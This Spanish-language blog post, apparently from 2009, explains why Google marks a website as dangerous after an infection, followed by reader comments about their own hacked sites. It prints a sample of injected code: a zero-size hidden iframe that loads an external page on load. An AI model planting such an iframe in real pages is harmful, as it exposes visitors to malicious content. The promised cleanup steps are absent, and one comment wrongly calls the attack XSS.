¿Quieres registrarte?

Qué hacer si tu web es marcado como malicioso o atacado

Por: psycho-vnz
9 de Noviembre del 2009

Si tienes un sitio web señalado como un sitio que puede afectar el equipo del usuario que lo visite (como la imagen de abajo) y no sabes por qué pasó, seguro pensarás:
"WTF?!?! pero si mi sitio no es para descargar software malicioso o__O ."

Esto es debido a que tu PC esta infectada con algún virus y al subir algún archivo vía FTP a tu servidor subiste una copia del virus. O que alguna aplicación web que tengas instalada en tu servidor tenía un hueco de seguridad y fuiste hackeado.

Al estar el virus en tu servidor lo que hace es insertar código html en todos los archivos index y home de cualquier extensión entre las etiquetas <body> y </body>, normalmente agrega un iframe y llamar una pagina que se encuentra en otro servidor.

Por ejemplo:

Código :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Ejemplo</title>
</head>
<body>
   <iframe frameborder="0" onload="if (!this.src){ this.src='URL externo'; this.height='0'; this.width='0';}">qfmhtowbkedyblfscqtlcmxickfnrxm</iframe>
</body>
</html>


Cuando Google detecta este tipo de ataque en tu sitio lo que hace es colocar en el resultado de cada búsqueda en donde aparezca tu sitio el texto "Este sitio puede dañar tu equipo" debajo del link. Si el usuario ignora el mensaje Google mostrara de nuevo un mensaje informado que el sitio al que intenta entrar puede dañar su equipo si da click al link desde el resultado de la búsqueda.

Si entras directamente colocando el dominio del sitio en tu navegador Firefox, Chrome o Safari te mostrará un mensaje diciendo que el sitio es peligroso y te preguntaran si quieres continuar.

En caso que te suceda esto a continuación unos pasos a seguir para solventar este problema:


El tiempo máximo que he esperado es de 24 horas luego de limpiar el sitio y enviarle la notificación a Google pero podría ser menos.

 


También te interesa


Etiquetas webmasters seguridad google

Comentarios | Enviar un comentario
Un gran aporte Psycho-vnz, estos últimos dias creo que ese mensaje de aviso saltaba con forosdelweb.com... es bueno saber que es lo que sucede.
Por: Azlinraeh
Muy bueno! Si alguna vez nos pasa algo semejante ya sabremos como solucionarlo! =)
Por: ur!
A mi me ha pasado. Importantísimo cambiar la clave del FTP
Por: Fran-blog
Ah, y no sólo me afectó a los index. Modificó cantidad de archivos .html y .php
Los localicé por la fecha-hora de modificación del archivo. Todos los que habían sido modificados coincidiendo con el index donde detecté el iframe.

Saludos.
Por: Fran-blog
Yo llevo unas semanas que google me bloquea el dominio http://www.vayachorrada.com por este motivo pero no he encontrado aun la causa. Es una locura, y la web de analisis de google no me da ninguna pista http://www.google.com/safebrowsing/diagnostic?site=http://www.vayachorrada.com/&hl=es
Por: Alberto-blog
wiiiiiii, gracias. Ahora no correre gritando como loco por la oficina
Por: Dientuki
xD yo ya la vivi esa, solucion cambiar de hosting tambien, era un problema de seguridad del servidor que tenia un apache viejo y seguro entraban explotando alguna vulnerabilidad, lo primero que hice es avisar al hosting pero los admins de dicha empresa 0 seriedad. Yo sabia mas que ellos, penoso.
Por: Gustavo Novaro-blog
En mi caso, lo que hice fue entrar al webftp y eliminar todos los archivos y cambiarme de Hosting.

Es un ataque llamado XSS Directo, el Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. Hay Script para evitar esto.
Por: Siriö
yo hice eso una vez y no encontre nada en los htm y php, pero el codigo estaba en el fichero htaccess que mandaba la web a otro sitio.
Por: christian-blog
Usando Visual Web Developer Express para proteger los script usando asp.net y .htacces con parametros raros y cosas desconocidas
Por: Siriö
Deja un comentario
IMPORTANTE

Recuerda ser respetuoso, no insultes a otras personas, ni uses palabrotas, hay una persona al otro lado de la pantalla.

Habla bien, NO ESCRIBAS EN MAYUSCULA TODO, no escribas como en un SMS, evita cosas como "ke", "x q" y demás abreviaciones.

Aquí funcionan las etiquetas de los foros, puedes usar [b] para negrita, [img] para las imágenes, [url] para los enlaces, etc.

Si tienes preguntas técnicas, envíalas mejor al foro.